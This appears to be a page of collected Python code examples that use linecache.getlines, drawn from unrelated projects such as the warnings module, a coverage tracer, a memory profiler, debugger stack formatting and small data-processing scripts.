        Count how many 'unstable' patterns (control-flow keywords where an
        insertion would break the code) occur in *line*; non-zero means the
        following line must be skipped.
        :param line:
        :return:
        """
        pattern = ['foreach', 'for', 'if', 'else']
        return len(list(filter(lambda x: x in line, pattern)))

    api = linecache.getlines(config.method_api_out_path)

    insert_points_list = []
    with open('insert.yaml', 'r', encoding='utf-8') as f:
        insert_points_list = yaml.load(f, yaml.SafeLoader)

    for insert_points in insert_points_list:
        file_path = concat_abs_path(path, insert_points['file'])
        insert_points = insert_points['pattern']

        lines = linecache.getlines(file_path)
        out = lines.copy()

        find = False
        method_end_str = ''
        times = 0
        skip = 0
        for index, line in enumerate(lines):

            def validate_line(line):
                return line.find(';') != -1 and line.find('return') == -1

            if find and line == method_end_str:  # left the method body; reset state
                find = False
                skip = 0
                continue

            if skip > 0:  # skip the line following an unstable pattern
                skip = skip - 1
                continue

            if line.strip().startswith('//'):  # skip comment lines
                continue

            if len(list(filter(lambda x: x in line,
                               insert_points))) > 0:  # found a target method
                find = True
                method_end_str = lines[index + 1].replace('{', '}')  # closing-brace indentation marking the end of the method
                times = 0
                continue

            skip = skip_num(line)  # count unstable patterns on this line
            if skip > 0:
                continue

            if find and validate_line(line) and roll():  # inside a target method, valid statement, and the dice say insert
                for i in range(
                        random.randint(config.insert_min, config.insert_max)):
                    out[index] = out[index] + (line.replace(
                        '    ',
                        '\t').count('\t')) * '\t' + get_random_api_text()
                    times = times + 1
        linecache.clearcache()
        with open(file_path, 'w') as f:
            f.writelines(out)
            logging.info('insert:{0} [{1}] times'.format(file_path, times))
Beispiel #40
0
def warn_explicit(message, category, filename, lineno,
                  module=None, registry=None, module_globals=None):
    """Low-level warning issuer: apply the filter list and dispatch.

    Mirrors ``warnings.warn_explicit``: normalizes the module name,
    consults ``registry``/``onceregistry`` to suppress duplicates, walks
    the global ``filters`` list for the first matching entry, then acts
    on its action ("ignore", "error", "once", "always", "module",
    "default").
    """
    lineno = int(lineno)
    if module is None:
        module = filename or "<unknown>"
        # Strip a trailing ".py" so the name matches module filter patterns.
        if module[-3:].lower() == ".py":
            module = module[:-3]  # XXX What about leading pathname?
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        text, category = str(message), message.__class__
    else:
        text, message = message, category(message)

    key = (text, category, lineno)
    # Fast path: this exact warning was already issued here.
    if registry.get(key):
        return

    # Find the first filter entry matching this warning.
    for item in filters:
        action, msg, cat, mod, ln = item
        text_ok = msg is None or msg.match(text)
        cat_ok = issubclass(category, cat)
        mod_ok = mod is None or mod.match(module)
        line_ok = ln == 0 or lineno == ln
        if text_ok and cat_ok and mod_ok and line_ok:
            break
    else:
        action = defaultaction

    if action == "ignore":
        registry[key] = 1
        return

    # Prime the linecache for formatting, in case the
    # "file" is actually in a zipfile or something.
    linecache.getlines(filename, module_globals)

    if action == "error":
        raise message

    # Remaining actions decide whether the warning is shown this time.
    if action == "once":
        registry[key] = 1
        oncekey = (text, category)
        if onceregistry.get(oncekey):
            return
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        # Unrecognized actions are errors
        raise RuntimeError(
              "Unrecognized action (%r) in warnings.filters:\n %s" %
              (action, item))

    # Print message and context
    showwarning(message, category, filename, lineno)
    def write_results(self, show_missing=True, summary=False, coverdir=None):
        """
        Write the coverage results.

        :param show_missing: Show lines that had no hits.
        :param summary: Include coverage summary per module.
        :param coverdir: If None, the results of each module are placed in its
                         directory, otherwise it is included in the directory
                         specified.
        """
        # List the functions that were called, when call tracking is on.
        if self.calledfuncs:
            print(file=self.output_file)
            print("functions called:", file=self.output_file)
            self.maybe_flush()
            calls = self.calledfuncs
            for filename, modulename, funcname in sorted(calls):
                print(("filename: %s, modulename: %s, funcname: %s" %
                       (filename, modulename, funcname)),
                      file=self.output_file)
                self.maybe_flush()

        # Report caller -> callee relationships, grouped by caller file.
        if self.callers:
            print(file=self.output_file)
            print("calling relationships:", file=self.output_file)
            self.maybe_flush()
            lastfile = lastcfile = ""
            for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) \
                    in sorted(self.callers):
                # New caller file: print a section banner.
                if pfile != lastfile:
                    print(file=self.output_file)
                    print("***", pfile, "***", file=self.output_file)
                    self.maybe_flush()
                    lastfile = pfile
                    lastcfile = ""
                # Cross-file call: note the callee file once per section.
                if cfile != pfile and lastcfile != cfile:
                    print("  -->", cfile, file=self.output_file)
                    self.maybe_flush()
                    lastcfile = cfile
                print("    %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc),
                      file=self.output_file)
                self.maybe_flush()

        # turn the counts data ("(filename, lineno) = count") into something
        # accessible on a per-file basis
        per_file = {}
        for filename, lineno in self.counts:
            lines_hit = per_file[filename] = per_file.get(filename, {})
            lines_hit[lineno] = self.counts[(filename, lineno)]

        # accumulate summary info, if needed
        sums = {}

        for filename, count in per_file.items():
            if self.is_ignored_filename(filename):
                continue

            # Map compiled files back to their source (.pyc -> .py).
            if filename.endswith(".pyc"):
                filename = filename[:-1]

            if coverdir is None:
                dir = os.path.dirname(os.path.abspath(filename))
                modulename = _modname(filename)
            else:
                dir = coverdir
                if not os.path.exists(dir):
                    os.makedirs(dir)
                modulename = _fullmodname(filename)

            # If desired, get a list of the line numbers which represent
            # executable content (returned as a dict for better lookup speed)
            if show_missing:
                lnotab = _find_executable_linenos(filename)
            else:
                lnotab = {}
            source = linecache.getlines(filename)
            coverpath = os.path.join(dir, modulename + ".cover")
            # Detect the source file's encoding so the .cover output is
            # written with the same one.
            with open(filename, 'rb') as fp:
                encoding, _ = tokenize.detect_encoding(fp.readline)
            n_hits, n_lines = self.write_results_file(coverpath, source,
                                                      lnotab, count, encoding)
            if summary and n_lines:
                percent = int(100 * n_hits / n_lines)
                sums[modulename] = n_lines, percent, modulename, filename

        # Per-module coverage summary table.
        if summary and sums:
            print("lines   cov%   module   (path)", file=self.output_file)
            self.maybe_flush()
            for m in sorted(sums):
                n_lines, percent, modulename, filename = sums[m]
                print("%5d   %3d%%   %s   (%s)" % sums[m],
                      file=self.output_file)
                self.maybe_flush()

        if self.outfile:
            # try and store counts and module info into self.outfile
            try:
                pickle.dump((self.counts, self.calledfuncs, self.callers),
                            open(self.outfile, 'wb'), 1)
            except OSError as err:
                print("Can't save counts files because %s" % err,
                      file=sys.stderr)
Beispiel #42
0
def show_results(prof, stream=None, precision=3):
    """Render per-line memory usage recorded in ``prof.code_map`` to *stream*.

    :param prof: profiler whose ``code_map`` maps code objects to per-line
                 measurement lists — assumed lists of floats; TODO confirm.
    :param stream: output stream; defaults to ``sys.stdout``.
    :param precision: number of decimal places for the MB figures.
    """
    if stream is None:
        stream = sys.stdout
    template = '{0:>6} {1:>12} {2:>12}   {3:<}'

    for code in prof.code_map:
        lines = prof.code_map[code]
        if not lines:
            # .. measurements are empty ..
            continue
        filename = code.co_filename
        # Map compiled files back to their source (.pyc/.pyo -> .py).
        if filename.endswith((".pyc", ".pyo")):
            filename = filename[:-1]
        stream.write('Filename: ' + filename + '\n\n')
        if not os.path.exists(filename):
            stream.write('ERROR: Could not find file ' + filename + '\n')
            if filename.startswith("ipython-input") or filename.startswith(
                    "<ipython-input"):
                print("NOTE: %mprun can only be used on functions defined in "
                      "physical files, and not in the IPython environment.")
            continue
        # Extract the function's own source block from the whole file.
        all_lines = linecache.getlines(filename)
        sub_lines = inspect.getblock(all_lines[code.co_firstlineno - 1:])
        linenos = range(code.co_firstlineno,
                        code.co_firstlineno + len(sub_lines))
        lines_normalized = {}

        header = template.format('Line #', 'Mem usage', 'Increment',
                                 'Line Contents')
        stream.write(header + '\n')
        stream.write('=' * len(header) + '\n')
        # move everything one frame up
        keys = sorted(lines.keys())

        # Shift each line's measurements to the previous recorded line,
        # padding newly exposed slots with -1.0 sentinels.
        # NOTE(review): assumes ``keys`` is non-empty (guaranteed by the
        # ``if not lines`` check above) — the padding mutates ``lines``
        # in place; confirm that is acceptable to callers.
        k_old = keys[0] - 1
        lines_normalized[keys[0] - 1] = lines[keys[0]]
        for i in range(1, len(lines_normalized[keys[0] - 1])):
            lines_normalized[keys[0] - 1][i] = -1.
        k = keys.pop(0)
        while keys:
            lines_normalized[k] = lines[keys[0]]
            for i in range(len(lines_normalized[k_old]),
                           len(lines_normalized[k])):
                lines_normalized[k][i] = -1.
            k_old = k
            k = keys.pop(0)

        # Report the peak per line plus the increment over the previous line.
        first_line = sorted(lines_normalized.keys())[0]
        mem_old = max(lines_normalized[first_line])
        precision = int(precision)
        template_mem = '{{0:{0}.{1}'.format(precision + 6, precision) + 'f} MB'
        for i, l in enumerate(linenos):
            mem = ''
            inc = ''
            if l in lines_normalized:
                mem = max(lines_normalized[l])
                inc = mem - mem_old
                mem_old = mem
                mem = template_mem.format(mem)
                inc = template_mem.format(inc)
            # sub_lines entries keep their trailing newline, so none is added.
            stream.write(template.format(l, mem, inc, sub_lines[i]))
        stream.write('\n\n')
Beispiel #43
0
 def read_records(self, task):
     """Return lines [shard.start:shard.end) of the shard's file.

     Lines are fetched via linecache, so a missing file yields [].
     """
     all_lines = linecache.getlines(task.shard.name)
     return all_lines[task.shard.start:task.shard.end]
Beispiel #44
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""

    file = getfile(object)
    sourcefile = getsourcefile(object)
    # No source file and not a pseudo-file like "<stdin>": give up early.
    if not sourcefile and file[:1] + file[-1:] != '<>':
        raise IOError('source code not available')
    file = sourcefile if sourcefile else file

    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        return lines, 0

    if isclass(object):
        name = object.__name__
        pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
        # make some effort to find the best matching class definition:
        # use the one with the least indentation, which is the one
        # that's most probably not inside a function definition.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # if it's at toplevel, it's already the best one
                if lines[i][0] == 'c':
                    return lines, i
                # else add whitespace to candidate list
                candidates.append((match.group(1), i))
        if candidates:
            # this will sort by whitespace, and by line number,
            # less whitespace first
            candidates.sort()
            return lines, candidates[0][1]
        else:
            raise IOError('could not find class definition')

    # Reduce methods/functions/tracebacks/frames to a code object.
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        # BUGFIX: co_firstlineno can exceed len(lines) when the cached
        # source is stale or shorter than the compiled code, which made
        # lines[lnum] below raise IndexError.  Clamp it, as the patched
        # findsource variant elsewhere in this file already does.
        lnum = min(object.co_firstlineno, len(lines)) - 1
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        # Walk backwards to the def/lambda/decorator line that starts it.
        while lnum > 0:
            if pat.match(lines[lnum]): break
            lnum = lnum - 1
        return lines, lnum
    raise IOError('could not find code object')
    def format_stack_entry(self, frame_lineno, lprefix=': ', context=3):
        """Return a colourised, pdb-style rendering of one stack entry.

        :param frame_lineno: ``(frame, lineno)`` pair to render.
        :param lprefix: unused in this body; kept for interface compatibility.
        :param context: number of source lines to show around ``lineno``.
        """
        # NOTE(review): ``import repr`` is Python 2 only (renamed
        # ``reprlib`` in Python 3), so this method cannot run on Python 3
        # as written.
        import linecache, repr

        ret = []

        # Colour templates built from the active colour scheme.
        Colors = self.color_scheme_table.active_colors
        ColorsNormal = Colors.Normal
        tpl_link = '%s%%s%s' % (Colors.filenameEm, ColorsNormal)
        tpl_call = '%s%%s%s%%s%s' % (Colors.vName, Colors.valEm, ColorsNormal)
        tpl_line = '%%s%s%%s %s%%s' % (Colors.lineno, ColorsNormal)
        tpl_line_em = '%%s%s%%s %s%%s%s' % (Colors.linenoEm, Colors.line,
                                            ColorsNormal)

        frame, lineno = frame_lineno

        # Show the recorded return value, when the debugger stored one.
        return_value = ''
        if '__return__' in frame.f_locals:
            rv = frame.f_locals['__return__']
            #return_value += '->'
            return_value += repr.repr(rv) + '\n'
        ret.append(return_value)

        #s = filename + '(' + `lineno` + ')'
        filename = self.canonic(frame.f_code.co_filename)
        link = tpl_link % filename

        if frame.f_code.co_name:
            func = frame.f_code.co_name
        else:
            func = "<lambda>"

        # Render the call signature when argument info is available.
        call = ''
        if func != '?':
            if '__args__' in frame.f_locals:
                args = repr.repr(frame.f_locals['__args__'])
            else:
                args = '()'
            call = tpl_call % (func, args)

        # The level info should be generated in the same format pdb uses, to
        # avoid breaking the pdbtrack functionality of python-mode in *emacs.
        if frame is self.curframe:
            ret.append('> ')
        else:
            ret.append('  ')
        ret.append('%s(%s)%s\n' % (link, lineno, call))

        # Show ``context`` source lines centred on the current line.
        # NOTE(review): min() runs after max(), so ``start`` can end up
        # negative when the file is shorter than ``context`` — verify
        # whether that is intended.
        start = lineno - 1 - context // 2
        lines = linecache.getlines(filename)
        start = max(start, 0)
        start = min(start, len(lines) - context)
        lines = lines[start:start + context]

        for i, line in enumerate(lines):
            show_arrow = (start + 1 + i == lineno)
            # Emphasize the current frame's lines and the arrow line.
            linetpl = (frame is self.curframe or show_arrow) \
                      and tpl_line_em \
                      or tpl_line
            ret.append(
                self.__format_line(linetpl,
                                   filename,
                                   start + 1 + i,
                                   line,
                                   arrow=show_arrow))

        return ''.join(ret)
Beispiel #46
0
def main():
    """Train a multinomial HMM on symbol sequences read from ``train_file``.

    Reads the cached training lines, label-encodes the symbols, fits an
    HMM, and pickles both the label encoder and the model under
    ``MODEL_PATH``.
    """
    le = preprocessing.LabelEncoder()
    x = np.array([])
    x_len = np.array([])

    # Load every training line once; workers receive slices of this cache.
    line_cache = linecache.getlines(train_file)
    count = len(line_cache)
    number = int(count / chunk_lines)
    print(count)
    print(number)

    t()
    # Fan parsing out over 10 worker processes, one chunk each.
    # NOTE(review): apply_async's second argument is the *args* tuple, so
    # each line of the slice becomes a separate positional argument to
    # read_distributed — confirm that matches its signature.
    # NOTE(review): only the first 10 * chunk_lines lines are processed;
    # the remainder (see the commented-out line below) is dropped.
    pool = mp.Pool(processes=10)
    jobs = []
    for i in range(10):
        jobs.append(
            pool.apply_async(
                read_distributed,
                line_cache[i * chunk_lines:i * chunk_lines + chunk_lines]))
    # jobs.append(pool.apply_async(read_distributed, line_cache[number * chunk_lines : count]))
    for job in jobs:
        x = np.append(x, job.get()[0])
        x_len = np.append(x_len, job.get()[1])
    pool.close()

    # Collect the distinct symbols (first-seen order) for the encoder.
    labels = []
    for number in x:
        if number in labels:
            pass
        else:
            labels.append(number)

    # print(labels)
    le.fit(labels)

    print('**************************************')
    t()
    print(le.classes_)
    # Persist the fitted label encoder.
    model_le_name = MODEL_PATH + 'le.pkl'
    with open(model_le_name, 'wb') as model_file:
        pickle.dump(le, model_file)
    print("le saved")

    x = x[:, np.newaxis]

    # Encode the symbols as an (n, 1) int32 observation array for hmmlearn.
    new_x = le.transform(x)
    X = np.array(new_x).astype('int32')
    # X = X[:, np.newaxis]
    X = X.reshape(-1, 1)
    # print(X.shape)
    # print(X.dtype)
    #
    print(X)
    print(len(X))
    #
    # print(x_len.shape)
    # print(x_len.dtype)
    X_len = np.array(x_len).astype('int32')

    # print(X_len.shape)
    # print(X_len.dtype)
    print(sum(X_len))

    number_of_status = 100
    print('¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥')
    t()
    print('Start Training')
    # Fit a 100-state multinomial HMM; X_len gives per-sequence lengths.
    model = hmm.MultinomialHMM(n_components=number_of_status,
                               n_iter=10000,
                               tol=0.01,
                               verbose=True)
    model.fit(X, X_len)
    # print(model.score(x,x_len))
    print('**************************************')
    print(model.transmat_)
    # Persist the trained HMM.
    model_name = MODEL_PATH + 'hmm.pkl'
    with open(model_name, 'wb') as model_file:
        pickle.dump(model, model_file)
    print("hmm saved")
Beispiel #47
0
def warn_explicit(message,
                  category,
                  filename,
                  lineno,
                  module=None,
                  registry=None,
                  module_globals=None):
    """Low-level warning issuer: filter, deduplicate and display a warning.

    Mirrors the stdlib ``warnings.warn_explicit``: normalizes the module
    name, consults ``registry``/``onceregistry`` to suppress duplicates,
    finds the first matching entry in the global ``filters`` list and acts
    on its action; finally checks that any overridden ``showwarning``
    supports the 'line' argument before dispatching to it.
    """
    lineno = int(lineno)
    if module is None:
        module = filename or "<unknown>"
        # Strip a trailing ".py" so the name matches module filter patterns.
        if module[-3:].lower() == ".py":
            module = module[:-3]  # XXX What about leading pathname?
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    # Quick test for common case
    if registry.get(key):
        return
    # Search the filters
    for item in filters:
        action, msg, cat, mod, ln = item
        if ((msg is None or msg.match(text)) and issubclass(category, cat)
                and (mod is None or mod.match(module))
                and (ln == 0 or lineno == ln)):
            break
    else:
        action = defaultaction
    # Early exit actions
    if action == "ignore":
        registry[key] = 1
        return

    # Prime the linecache for formatting, in case the
    # "file" is actually in a zipfile or something.
    linecache.getlines(filename, module_globals)

    if action == "error":
        raise message
    # Other actions
    if action == "once":
        registry[key] = 1
        oncekey = (text, category)
        if onceregistry.get(oncekey):
            return
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        # Unrecognized actions are errors
        raise RuntimeError(
            "Unrecognized action (%r) in warnings.filters:\n %s" %
            (action, item))
    # Warn if showwarning() does not support the 'line' argument.
    # Don't use 'inspect' as it relies on an extension module, which break the
    # build thanks to 'warnings' being imported by setup.py.
    # NOTE(review): ``func_code`` is the Python 2 spelling; on Python 3 the
    # attribute is ``__code__``, so this check silently does nothing there.
    fxn_code = None
    if hasattr(showwarning, 'func_code'):
        fxn_code = showwarning.func_code
    elif hasattr(showwarning, '__func__'):
        fxn_code = showwarning.__func__.func_code
    if fxn_code:
        args = fxn_code.co_varnames[:fxn_code.co_argcount]
        CO_VARARGS = 0x4
        if 'line' not in args and not fxn_code.co_flags & CO_VARARGS:
            showwarning_msg = ("functions overriding warnings.showwarning() "
                               "must support the 'line' argument")
            if message == showwarning_msg:
                _show_warning(message, category, filename, lineno)
            else:
                warn(showwarning_msg, DeprecationWarning)
    # Print message and context
    showwarning(message, category, filename, lineno)
# Load the precomputed surface-residue mapping for each protein chain.
picklefile = open('/home/songjz671/covariancesurfaceout/surface.pickle', 'rb')
surface = pickle.load(picklefile)
#print(surface)
#print(surface['1ACB_E'])
omessurface = {}
# Collect every OMES covariance output file under the results directory.
filelist = []
for root, dirs, files in os.walk('/home/songjz671/covarianceout/omes'):
    for file in files:
        filelist.append(os.path.join(root, file))
for each in filelist:
    #w=xlwt.Workbook()
    #ws = w.add_sheet('covariance')
    filename = each.split('/')[-1]
    proteinid = filename.split('.')[0]
    # Read all lines; iteration below starts at 1, skipping the first line.
    a = linecache.getlines(each)
    pointresult = {}
    surfaceresult = {}
    # Register every residue appearing in either column of a pair line.
    for i in range(1, len(a)):
        part1 = a[i].split()[0]
        part2 = a[i].split()[1]
        if part1 not in pointresult.keys():
            pointresult[part1] = 0
        if part2 not in pointresult.keys():
            pointresult[part2] = 0
    num = len(pointresult.keys()) - 1
    # NOTE(review): this snippet is truncated here — the body of the final
    # ``if`` statement below is missing from this file.
    for each_item in pointresult.keys():
        for each_one in range(1, len(a)):
            partone = a[each_one].split()[0]
            parttwo = a[each_one].split()[1]
            if each_item == partone or each_item == parttwo:
Beispiel #49
0
                x[line_no][col_no] = sku_dict[i]
                mask[line_no][col_no] = 1
                col_no += 1
            if col_no >= max_window_size:
                break
        word_num[line_no] = col_no
        line_no += 1

    return x, np.array(y).reshape(batch_size, 1), mask.reshape(
        batch_size, max_window_size, 1), word_num.reshape(batch_size, 1)


#========================
# Build label/vocabulary tables from the training file, then keep all
# training lines in memory for batch generation.
init_data(train_file)
n_classes = len(label_dict)
train_lst = linecache.getlines(train_file)
print("Class Num: ", n_classes)

# Store layers weight & bias
weights = {
    'h1': tf.Variable(tf.random_normal([emb_size, n_hidden_1])),
    # 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_hidden_1, n_classes]))
}
biases = {
    'b1': tf.Variable(tf.random_normal([n_hidden_1])),
    # 'b2': tf.Variable(tf.random_normal([n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_classes]))
}

def main():
    """Score cached HTML pages with tag/word naive-Bayes-style probabilities.

    Loads per-tag and per-word probability and weight tables from disk,
    scores every HTML file under ``HtmlDataPath``, and prints the files
    sorted by descending score.

    NOTE(review): Python 2 only (print statements, ``dict.has_key``).
    """
    HtmlTagNbData= "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\tagnb.txt"
    HtmlWordNbData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\wordnb.txt"
    HtmlTagWeightData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\tagassess.txt"
    HtmlWordWeightData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\wordassess.txt"
    TagDict ={}
    WordDict ={}
    TagWeight = {}
    WordWeight = {}
    # Each input line is "<token> <value>\n"; parse into lookup tables below.
    Tags = lc.getlines(HtmlTagNbData)
    Words = lc.getlines(HtmlWordNbData)
    TagWeights = lc.getlines(HtmlTagWeightData)
    WordWeights = lc.getlines(HtmlWordWeightData)
    # Corpus statistics (hard-coded sample sizes).
    Total = 125
    Spam = 29
    NonSpam = 96
    for tag in Tags:
        tag1 = tag.split(" ")[0]
        proba = tag.split(" ")[1]
        proba = proba.split("\n")[0]
        TagDict.setdefault(tag1,proba)
    for word in Words:
        word1 = word.split(" ")[0]
        proba = word.split(" ")[1]
        proba = proba.split("\n")[0]
        WordDict.setdefault(word1,proba)
    for tagweight in TagWeights:
        tagweight1 = tagweight.split(" ")[0]
        fun = tagweight.split(" ")[1]
        fun = fun.split("\n")[0]
        TagWeight.setdefault(tagweight1,fun)
    for wordweight in WordWeights:
        wordweight1 = wordweight.split(" ")[0]
        fun = wordweight.split(" ")[1]
        fun = fun.split("\n")[0]
        WordWeight.setdefault(wordweight1,fun)
    HtmlDataPath = "E:\UnderGraduateDesign\ExperimentSample\HtmlSource2"
    HtmlFiles = os.listdir(HtmlDataPath)
    HtmlProbDict = {}
    for f in HtmlFiles:
        fo = open(HtmlDataPath + "/" + f,"r")
        html = fo.read()
        fo.close()
        # Extract tag sequence and segmented word list from the page.
        taglist = tte.Extract(html)
        words = ws.ExtractCharacter(html)
        wordlist = ','.join(ws.SepWord(words)).split(",")
        # Multiply per-token probability * weight into combined scores.
        Tprob = 1.0
        Wprob = 1.0
        for tag in taglist:
            if TagDict.has_key(tag) and TagWeight.has_key(tag):
                Tprob = Tprob*float(TagDict[tag])*float(TagWeight[tag])
        for word in wordlist:
            if WordDict.has_key(word) and WordWeight.has_key(word):
                 Wprob = Wprob*float(WordDict[word])*float(WordWeight[word])
        Tprob = Spam*Tprob
        Wprob = Spam*Wprob
        Allprob = Tprob*Wprob
        HtmlProbDict.setdefault(fng.DeGenerate(f),Allprob)
        print fng.DeGenerate(f),":",Allprob
    # Sort files by score, highest first, and print.
    FunList = sorted(HtmlProbDict.items(), key=lambda e:e[1], reverse=True)
    for fun in FunList:
        print fun
Beispiel #51
0
import linecache
from collections import Counter
from nltk.corpus import stopwords
from nltk import bigrams
from nltk import pos_tag
import string
import re
from nltk.tokenize import TweetTokenizer

# Tokenizer that drops @handles and squashes repeated characters.
tknz = TweetTokenizer(strip_handles=True, reduce_len=True)
# Stoplist: English stopwords + punctuation + common twitter noise tokens.
stop = stopwords.words('english') + list(
    string.punctuation) + ['rt', 'via', 'u', 'im', '...', '..', ':)']

# Input lines are tab-separated; the tweet text is the third field.
tweets = linecache.getlines("dev-tweets.txt")
tweets = [x.split("\t") for x in tweets]
f = open('dev-parsed.txt', 'w', encoding='utf-8')

# For each tweet write "[unique unigrams, unique bigrams]" on one line.
for line in tweets:
    line[2] = line[2].replace("'", " ")
    terms_all = [
        term for term in tknz.tokenize(line[2].lower())
        if term not in stop and (len(term) > 1 and not term.isdigit())
    ]
    bgs = bigrams(terms_all)
    f.write(str([list(set(terms_all)), list(set(bgs))]) + '\n')
f.close()
print("#######################")
print("done")
Beispiel #52
0
    def format_stack_entry(self, frame_lineno, lprefix=': ', context=None):
        """Return a colourised, pdb-style rendering of one stack entry.

        :param frame_lineno: ``(frame, lineno)`` pair to render.
        :param lprefix: unused in this body; kept for interface compatibility.
        :param context: number of source lines shown around ``lineno``;
                        defaults to ``self.context``.
        """
        if context is None:
            context = self.context
        # NOTE(review): invalid context values are only reported, never
        # rejected — execution continues with the bad value after printing.
        try:
            context=int(context)
            if context <= 0:
                print("Context must be a positive integer", file=self.stdout)
        except (TypeError, ValueError):
                print("Context must be a positive integer", file=self.stdout)
        # reprlib was named ``repr`` on Python 2.
        try:
            import reprlib  # Py 3
        except ImportError:
            import repr as reprlib  # Py 2

        ret = []

        # Colour templates built from the active colour scheme.
        Colors = self.color_scheme_table.active_colors
        ColorsNormal = Colors.Normal
        tpl_link = u'%s%%s%s' % (Colors.filenameEm, ColorsNormal)
        tpl_call = u'%s%%s%s%%s%s' % (Colors.vName, Colors.valEm, ColorsNormal)
        tpl_line = u'%%s%s%%s %s%%s' % (Colors.lineno, ColorsNormal)
        tpl_line_em = u'%%s%s%%s %s%%s%s' % (Colors.linenoEm, Colors.line,
                                            ColorsNormal)

        frame, lineno = frame_lineno

        # Show the recorded return value, when the debugger stored one.
        return_value = ''
        if '__return__' in frame.f_locals:
            rv = frame.f_locals['__return__']
            #return_value += '->'
            return_value += reprlib.repr(rv) + '\n'
        ret.append(return_value)

        #s = filename + '(' + `lineno` + ')'
        filename = self.canonic(frame.f_code.co_filename)
        link = tpl_link % py3compat.cast_unicode(filename)

        if frame.f_code.co_name:
            func = frame.f_code.co_name
        else:
            func = "<lambda>"

        # Render the call signature when argument info is available.
        call = ''
        if func != '?':
            if '__args__' in frame.f_locals:
                args = reprlib.repr(frame.f_locals['__args__'])
            else:
                args = '()'
            call = tpl_call % (func, args)

        # The level info should be generated in the same format pdb uses, to
        # avoid breaking the pdbtrack functionality of python-mode in *emacs.
        if frame is self.curframe:
            ret.append('> ')
        else:
            ret.append('  ')
        ret.append(u'%s(%s)%s\n' % (link,lineno,call))

        # Show ``context`` source lines centred on the current line,
        # clamped to the file boundaries.
        start = lineno - 1 - context//2
        lines = linecache.getlines(filename)
        start = min(start, len(lines) - context)
        start = max(start, 0)
        lines = lines[start : start + context]

        for i,line in enumerate(lines):
            show_arrow = (start + 1 + i == lineno)
            # Emphasize the current frame's lines and the arrow line.
            linetpl = (frame is self.curframe or show_arrow) \
                      and tpl_line_em \
                      or tpl_line
            ret.append(self.__format_line(linetpl, filename,
                                          start + 1 + i, line,
                                          arrow = show_arrow) )
        return ''.join(ret)
'''
Test functions for applying the regionalisation of Kreemer et al. (2003).
'''
import os
import unittest
import numpy as np
from linecache import getlines
from hmtk.strain.geodetic_strain import GeodeticStrain
from hmtk.strain.regionalisation.kreemer_regionalisation import (
    _build_kreemer_cell, KreemerRegionalisation)

# Directory holding the strain-data fixtures used by these tests.
BASE_DATA_PATH = os.path.join(os.path.dirname(__file__), 'strain_data')
KREEMER_2POLY_FILE = 'kreemer_2poly_sample.txt'
KREEMER_2REG_FILE = os.path.join(BASE_DATA_PATH,
                                 'kreemer_2poly_sample_2types.txt')
# Raw lines of the two-polygon sample file, loaded once at import time.
KREEMER_POLY_SAMPLE = getlines(os.path.join(BASE_DATA_PATH,
                                            KREEMER_2POLY_FILE))


class TestBuildKreemerCell(unittest.TestCase):
    def setUp(self):
        self.data = KREEMER_POLY_SAMPLE

    def test_build_kreemer_polygon(self):
        expected_output_1 = np.array([[179.4, -66.], [180., -66.],
                                      [180., -65.5], [179.4, -65.5],
                                      [179.4, -66.]])

        expected_output_2 = np.array([[180., -66.], [180.6, -66.],
                                      [180.6, -65.5], [180., -65.5],
                                      [180., -66.]])
        print(self.data)
Beispiel #54
0
 def get_source(self, file_name=None):
     """Return source lines: the in-memory statement, or a file via linecache.

     With no file name (or the registered script's own name) the cached
     statement is split into lines; otherwise the named file is read and
     each line right-stripped.
     """
     script_name = self.registry.get("script_file_name")
     if not file_name or file_name == script_name:
         return self.registry.get("statement").split("\n")
     return [line.rstrip() for line in linecache.getlines(file_name)]
Beispiel #55
0
 def test_getlines(self):
     """linecache.getlines() must return exactly the fixture's line list."""
     self.assertEqual(linecache.getlines(self.file_name), self.file_list)
Beispiel #56
0
import linecache
import time

now = time.time()  # script start time  # prep: organize the data

# Field names for each column of a record line, in column order.
data_keys = ('bid', 'uid', 'username', 'v_class', 'content', 'img', 'created_at', 'source', 'rt_num', 'cm_num', 'rt_uid', 'rt_username' \
, 'rt_v_class', 'rt_content', 'rt_img', 'src_rt_num', 'src_cm_num', 'gender', 'rt_bid', 'location', 'rt_mid', \
'mid', 'lat', 'lon', 'lbs_type', 'lbs_title', 'poiid', 'links', 'hashtags', 'ats', 'rt_links', 'rt_hashtags', 'rt_ats', \
'v_url', 'rt_v_url')


# Map each field name to its column index for lookups below.
keys = {data_keys[k]:k for k in range(0,len( data_keys))}
print(keys)


